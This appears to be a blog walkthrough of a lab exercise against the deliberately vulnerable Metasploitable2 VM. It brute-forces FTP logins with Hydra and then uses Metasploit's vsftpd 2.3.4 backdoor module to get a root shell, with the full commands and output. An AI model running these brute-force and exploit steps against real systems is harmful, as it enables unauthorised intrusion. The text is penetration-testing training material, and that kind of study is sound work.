Metasploitable2 - Exploiting FTP

pentest metasplitable
Metasploitable2

Metasploit2 - Exploiting FTP

From our previous scan we can see that the ftp port, port 21 is open and has a version vsftpd 2.3.4

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4

we can scan either google or metasploit to see if there is an exploit or vulnerability associated with this ftp version.

A google search yields a vulnerability for vsftpd 2.3.4 and code for an exploit. But we need to be logged in to be able to upload a reverse shell exploit (a way of setting up a shell on your machine that operates from the target machine).

“VSFTPD-Exploit”

So let’s use a password brute force tool like ‘Hydra’

hydra -L usernames.txt -P passlist.txt 192.168.56.2 ftp

Our results are:


hydra -L users.txt -P pass.txt 192.168.56.2 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-14 00:08:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:4/p:4), ~1 try per task
[DATA] attacking ftp://192.168.56.2:21/
[21][ftp] host: 192.168.56.2   login: msfadmin   password: msfadmin
[21][ftp] host: 192.168.56.2   login: postgres   password: postgres
[21][ftp] host: 192.168.56.2   login: user   password: user
[21][ftp] host: 192.168.56.2   login: service   password: service
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-14 00:08:48

We can check acces by remotely logging into the ftp service:

ftp msfadmin@192.168.56.2 
Connected to 192.168.56.2.
220 (vsFTPd 2.3.4)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

So we have a level of access and moving around the directories we can see we have lots of access but with the limitations of being constrained to the ftp service.

Remember we found an exploit in our google search for the VSFTPD 2.3.4 which we can use to gain more access here.

A tool within Kali linux, Metasploit, is one we will return to and has an exploit we can use here.

if we search Metasploit we find

searchsploit vsftpd
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consump | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                           | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution                  | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)     | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service                    | multiple/remote/49719.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Here we can see we have 2 Backdoor Command Execution

Lets run

> msfconsole

This can take some time to startup.

Then we search for vsftpd.

msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor

It would appear that the vsftpd_234_backdoor is a solid option.

So lets select that exploit:


msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact

Then we look at the exploit settings…

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-
                                       metasploit/basics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

…and see we need to set the target IP with RHOST and confirm its set/


sf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.56.2
RHOST => 192.168.56.2

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.56.2     yes       The target host(s), see https://docs.metasploit.com/docs/using-
                                       metasploit/basics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


View the full module info with the info, or info -d command.

And finally, we run the exploit.


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 172.20.10.6:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.20.10.6:21 - USER: 331 Please specify the password.
[+] 172.20.10.6:21 - Backdoor service has been spawned, handling...
[+] 172.20.10.6:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.20.10.9:37355 -> 172.20.10.6:6200) at 2024-11-14 14:34:51 +0000

whoami
root

As root we have full access to the target machine!

Troubleshooting:

If this doesn’t yield a shell after several tries:

  1. Is the target machine running? It’s easy to forget to start both machines!
  2. It might be that there is no actual connection between the Virtual machines. Try pinging from each machine to the other and check you are using bridged for the network options for each device.
  3. 2t might mean that you should re-uninstall and purge the metasploit framework before reinstalling.
OzRhodes | Categories |